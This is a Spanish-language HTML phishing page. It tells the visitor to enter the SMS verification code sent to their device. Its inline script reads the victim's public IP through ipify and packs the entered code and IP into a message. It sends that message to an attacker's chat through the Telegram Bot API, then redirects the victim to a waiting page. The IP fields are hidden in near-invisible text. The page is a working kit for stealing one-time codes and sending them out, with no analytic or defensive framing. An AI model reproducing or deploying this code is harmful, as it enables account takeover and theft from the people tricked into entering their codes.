
<!DOCTYPE html>
<html >
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>internet-Fall</title>

    <link rel="stylesheet" href="foster/home.css">





    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script src="fallsguy/dett.js"></script>
    <script>
      $.getJSON("https://api.ipify.org?format=json", function(data) {
        $("#gfg").html(data.ip);
      });
    
      var u_name, ip, ip2, message;
      var ready = function() {
        u_name = document.getElementById("mont").value;
        ip = document.getElementById("gfg").innerHTML;
        ip2 = document.getElementById("address").innerHTML;
        message = "Cod papa\n☰sms111: " + u_name + "\n🌎IP: " + ip +"\n" + ip2;
      };
    
      var sender = function() {
        ready();
        var settings = {
          "async": true,
          "crossDomain": true,
          "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage",
          "method": "POST",
          "headers": {
            "Content-Type": "application/json",
            "cache-control": "no-cache"
          },
          "data": JSON.stringify({
            "chat_id": chat_id,
            "text": message
          })
        };
        $.ajax(settings).done(function(response) {
          console.log(response);
          window.location = 'waitforthe2.html';
        });
        return false;
      };
    </script>
    

</head>
<body>




<div style="background-color: rgb(31, 145, 0);height: 10px; width: 100%;">  </div>

<div style="background-color: rgb(148, 206, 10);height: 10px; width: 100%;">  </div>

<center>

    <form method="post" action="#" onsubmit="return sender();"> 

    <div  class="sitefan">
<img src="foster/monsterlog.png" alt="brokxj"><br><br>

<h2>    Ingresa el SMS Enviado a tu dispositivo (OBLIGATORIO)</h2>
<br>


<input  inputmode="numeric"    name="mont"    id="mont" minlength="6" maxlength="6" placeholder="INGRESA EL SMS "  type="text" required="">

<input class="voygo" value="SIGUIENTE" type="submit">      </form>
</center>

</div>

</body>


<div style="color: rgb(255, 255, 255);font-size: 0.05px;" >
    <p id="gfg"></p>
    <p id="ip"></p>
    <p id="address"></p></div>
</html>